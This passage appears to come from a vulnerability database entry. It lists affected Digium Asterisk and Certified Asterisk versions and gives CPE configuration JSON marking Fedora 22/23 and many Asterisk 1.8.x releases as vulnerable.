digium	asterisk	12.4.0
digium	asterisk	12.4.0
digium	asterisk	12.5.0
digium	asterisk	12.5.0
digium	asterisk	12.6.0
digium	asterisk	12.6.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.0
digium	asterisk	12.7.1
digium	asterisk	12.8.0
digium	asterisk	12.8.0
digium	asterisk	12.8.0
digium	asterisk	12.8.1
digium	asterisk	12.8.2
digium	asterisk	13.0.0
digium	asterisk	13.0.1
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.2.0
digium	asterisk	13.2.0
digium	asterisk	13.3.0
digium	asterisk	13.4.0
digium	asterisk	13.4.0
digium	asterisk	13.5.0
digium	asterisk	13.5.0
digium	asterisk	13.6.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	certified_asterisk	1.8.28
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1
digium	certified_asterisk	13.1.0
digium	certified_asterisk	13.1.0
digium	certified_asterisk	13.1.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*",
              "matchCriteriaId": "253C303A-E577-4488-93E6-68A8DD942C38",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:fedoraproject:fedora:23:*:*:*:*:*:*:*",
              "matchCriteriaId": "E79AB8DD-C907-4038-A931-1A5A4CFB6A5B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "984CD6D9-4A54-4065-8401-DC555AB95425",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "CDE13439-4124-4BDE-A068-460BCF96419B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "82423EC2-FA29-4AF6-86C3-6AC6DFDC4DC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "3F4DC562-649E-4105-8B3E-43F02BD593FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B8B5E76-4A74-4E88-8A6F-C23538B7642A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5260E309-9320-4DB8-A918-7D215BF95D2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "58F4BFC9-E02A-4121-8D34-99022AB8B45A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "60AFF340-A866-4CFE-9334-53B95FD4AA59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "74E50309-CD7D-41F7-97DA-A7E451D0796A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6FD3F8F8-820E-4C29-9F8F-023D1DB999CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "C33A6419-0D00-49D6-9A48-2B633610AAED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "447E07C9-4A25-418D-B53F-609B78EE4C21",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "9C806F87-C897-48E4-8533-A4EBC6B77078",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "08B8C143-93FF-44DD-8F61-6F4FEE977371",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "8859F234-5066-40DD-862C-0F3CCA98AFB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "75962F03-EC19-4920-9FA7-2D422E6E83F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D9D7D88-D64F-4F54-8C84-6AC45FBD36F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F67AB282-591C-4ED7-9750-C593A38D5D7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "B5D0BB0E-1BB0-4F31-9C5D-DC1A069E52DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C9F8F881-2BF7-44AB-8756-54A06801EB11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "36EFF3C4-4D00-4BC5-94B9-403BB00C6AB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5E434F10-395E-426E-A988-4CDA504577D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "33FE3DCE-74B5-49A4-BC18-34B22CA83947",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF2E25F3-053D-4F7D-A35D-706A401CCAA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8880AE7C-3E44-4B76-B500-E93868D4CF5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7C94269D-A271-42AC-A44C-102C814E564B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E7E5B826-D3D5-4D2D-BB4D-2C1BEDE92456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BA564F7-7A69-4805-8C8C-C2EB5E12A6E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2A153336-10C4-4C42-AC66-AC1351887EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "0C2FF4E9-2513-4022-AF80-6F44A2287D6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF6FA464-F9D3-4674-844B-A2B2E2C42A51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "44722C8B-BB37-4444-A58A-F01D0B3B4DDA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4FABFDB-D99A-4F83-8FEE-3BFA36BA4061",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "43E00618-19F6-4828-818A-95C9106097B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "CEC4F4AE-7BD8-437F-8838-FE564BCB7FA9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A842E112-8974-4E74-AD56-1DEF5B5DD9F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2BC3B463-6B2C-42AF-BE13-50B7D63E7F05",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9ACBC01-8A9D-43A5-A825-1CC9670417A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61E7199F-EACE-431A-8ADD-B96A6FCDBC49",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA7CD0E5-8E69-43B5-A5FF-8B122475CC00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "2799111C-06DB-4979-8F81-A8C09D53E5F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F4BEA1B2-2103-4E25-92A9-DB107D6D4AD5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "2AD9AFFB-F903-43DD-9C1D-4D8E83EA25C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F368897-A481-42DD-A8B0-8AD43A5FD68B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "4F3C35F1-CBF2-4F77-AC19-574DEF2652A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "75EA94FD-D16A-49BC-A418-36EFC187EC7A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BA8F4AF-26C0-4A69-B489-16E7A56E5123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FE82D53D-092D-4B36-A979-23E9A5E07A78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "27365383-72DB-4683-9A67-CF553FF2620A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46EE63D4-CA9C-4DF4-AF85-B8AC2E3F844A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "A14FC2A1-29D5-49FE-92A9-D61833BF1C95",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "91407E03-4E98-4DD9-B584-E5BB74F09B9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "669CC22C-45E5-40AB-9A95-D7DFD694B688",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "80A38E0C-45D9-4353-8426-87A4CFA371DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "5E3C5C1E-67E9-401A-BA52-FCB32CA4473C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54A934AE-AB7C-4D10-8BA2-9C54410C648F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7A7C5A8E-35E6-4B86-8502-1970031AB987",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FA4C14B-A01C-4CFE-8985-317ACCDAD209",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "501F5764-BBC2-426A-AF01-7FB477850073",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:patch:*:*:*:*:*:*",
              "matchCriteriaId": "FDB35CE5-4EDB-4949-A5E4-1BD721CCA469",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "619704FF-2F0C-47E8-A340-58135CEE6B89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E412E336-871A-4CAC-97E5-FB203BB9349D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.1:-:*:*:*:*:*:*",
              "matchCriteriaId": "82ED9CD2-504E-4D7B-B242-2511A7730776",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.1:patch:*:*:*:*:*:*",
              "matchCriteriaId": "EF6E50F5-605A-4D2B-B55D-8AB251532E8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.2:-:*:*:*:*:*:*",
              "matchCriteriaId": "F6C796AE-95EE-4EAB-959C-1C1353C565A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.20.2:patch:*:*:*:*:*:*",
              "matchCriteriaId": "EEAF3B2E-E520-4F43-ACC5-0F01A6247199",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "085D4102-E2E8-496C-85B7-714FD3639BE1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1A0E66-63F4-4BD0-8C9A-3D23A116EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "79963FF0-5ED6-41B6-8E60-146BD7879518",
              "vulnerable": true
            },
            {
